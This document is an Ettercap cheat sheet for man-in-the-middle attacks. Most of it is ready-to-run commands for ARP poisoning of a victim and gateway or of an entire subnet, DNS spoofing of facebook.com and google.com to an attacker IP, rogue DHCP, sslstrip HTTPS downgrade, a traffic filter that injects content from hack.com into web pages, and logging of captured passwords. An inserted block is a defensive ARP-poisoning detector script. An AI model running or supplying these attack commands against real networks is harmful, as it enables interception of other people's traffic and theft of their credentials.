Ultimate Ettercap Cheat Sheet




A comprehensive suite for man-in-the-middle attacks, sniffing, and ARP poisoning.

1. Interface Modes

Ettercap can run in Text, Curses (GUI-like text), or GTK (Graphical) mode. All require root privileges.

Text Mode (-T)

Command line only. Best for scripts.

ettercap -T

Curses Mode (-C)

Ncurses interface. Best for SSH sessions.

ettercap -C

GTK Mode (-G)

Full Graphical User Interface.

ettercap -G

2. Sniffing Modes

Define how Ettercap listens on the network.

Unified Sniffing (default; -M selects the MITM method)

The standard mode: a single interface, with the man-in-the-middle method given to -M so that all traffic between the two targets passes through your machine.

ettercap -T -i eth0 -M arp:remote

Bridged Sniffing (-B)

Use two interfaces to act as a physical bridge (transparent to the network).

ettercap -T -i eth0 -B eth1

3. Target Specification

Ettercap uses a specific syntax: /Target1/ /Target2/.
Target 1 is usually the victim, Target 2 is usually the Gateway (Router).

Target Syntax

MAC/IPs/Ports

Each field may be left empty to mean "any". Example: /192.168.1.10// targets a specific IP (any MAC) on all ports.

Specific Victim & Router

Poison the connection between Victim (1.10) and Router (1.1).

ettercap -T -M arp:remote /192.168.1.10// /192.168.1.1//

Global Attack (Dangerous)

Target everyone on the subnet (// //). Every host's ARP cache is poisoned and all of their traffic must be forwarded by your machine, so this can crash the network.

ettercap -T -M arp:remote // //

4. MITM Attacks

The core functionality of Ettercap.

ARP Poisoning

Redirects traffic by spoofing ARP replies. The remote argument is required when one target is the gateway, so that connections to hosts outside the LAN are also sniffed.

ettercap -T -M arp:remote
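From the defender's side, the arp:remote attack above leaves a clear footprint: a single MAC starts answering for both the victim's and the gateway's IP, and the gateway's IP suddenly maps to a new MAC. The following script is an added example, not part of the original cheat sheet; it runs that check over constructed ARP-reply records (IP, MAC pairs using the sheet's addresses) such as a passive sniffer would collect.

```python
"""Flag ARP-poisoning signatures in a stream of ARP 'is-at' replies.

Added example (not from the original cheat sheet). Two signatures are checked:
  1. an IP whose MAC differs from the one first learned (or statically trusted), and
  2. a MAC that claims more than one IP (the attacker answering for both targets).
"""
from collections import defaultdict

# Constructed sample data: (sender_ip, sender_mac) taken from ARP replies on the wire.
SAMPLE_REPLIES = [
    ("192.168.1.1",  "aa:aa:aa:aa:aa:01"),   # legitimate gateway
    ("192.168.1.10", "bb:bb:bb:bb:bb:10"),   # legitimate victim host
    ("192.168.1.1",  "cc:cc:cc:cc:cc:99"),   # a third MAC claims the gateway IP
    ("192.168.1.10", "cc:cc:cc:cc:cc:99"),   # ...and the victim IP: the arp:remote pattern
]


def detect_arp_poisoning(replies, trusted=None):
    """Return a list of alert strings for the given (ip, mac) replies.

    `trusted` optionally maps IP -> MAC for hosts whose binding is known in
    advance (e.g. the gateway); otherwise the first binding seen is assumed good.
    """
    ip_to_mac = dict(trusted or {})
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac              # learn the first binding
        elif known != mac:
            alerts.append(f"MAC change for {ip}: {known} -> {mac}")
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:         # one station answering for several IPs
            alerts.append(f"{mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES):
        print(alert)
```

A router that legitimately holds several IPs will also trigger signature 2, so seed `trusted` with known bindings to keep the noise down.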

DNS Spoofing

Redirects DNS requests (e.g., facebook.com -> malicious IP). Requires editing /etc/ettercap/etter.dns.

1. Edit the file:

# /etc/ettercap/etter.dns
facebook.com      A   192.168.1.5
*.google.com      A   192.168.1.5

2. Run the attack (plugin):

ettercap -T -P dns_spoof -M arp:remote /192.168.1.10// //

DHCP Spoofing

Act as a rogue DHCP server. The argument is dhcp:IP_POOL/NETMASK/DNS_SERVER: the pool of addresses to hand out, the netmask, and the DNS server the leases will advertise.

ettercap -T -M dhcp:192.168.1.100-150/255.255.255.0/192.168.1.1

5. Filters & Plugins

Using Plugins (-P)

Ettercap has built-in plugins for various tasks.

  • dns_spoof: Redirect DNS.
  • repoison_arp: Force re-poisoning if the victim recovers.
  • sslstrip: Downgrade HTTPS to HTTP.

List the available plugins:

ettercap -T -P list

Etterfilters (Advanced)

Scripts that modify traffic on the fly (e.g., replace images, change text). Steps:

1. Write filter (filter.ef):

if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://hack.com/evil.jpg\" ");
   msg("Image replaced.\n");
}

2. Compile filter:

etterfilter filter.ef -o filter.ef.co

3. Load filter (-F):

ettercap -T -F filter.ef.co -M arp:remote

6. Logging & Visuals

Write to PCAP (-w)

Save traffic for Wireshark analysis.

ettercap -T -w output.pcap -M arp:remote

Log User Info (-l)

Log only passive host information and the usernames and passwords discovered (lowercase -l; uppercase -L logs every packet as well).

ettercap -T -l passwords -M arp:remote

Quiet Mode (-q)

Don't print packet content, only print found credentials.

ettercap -T -q -M arp:remote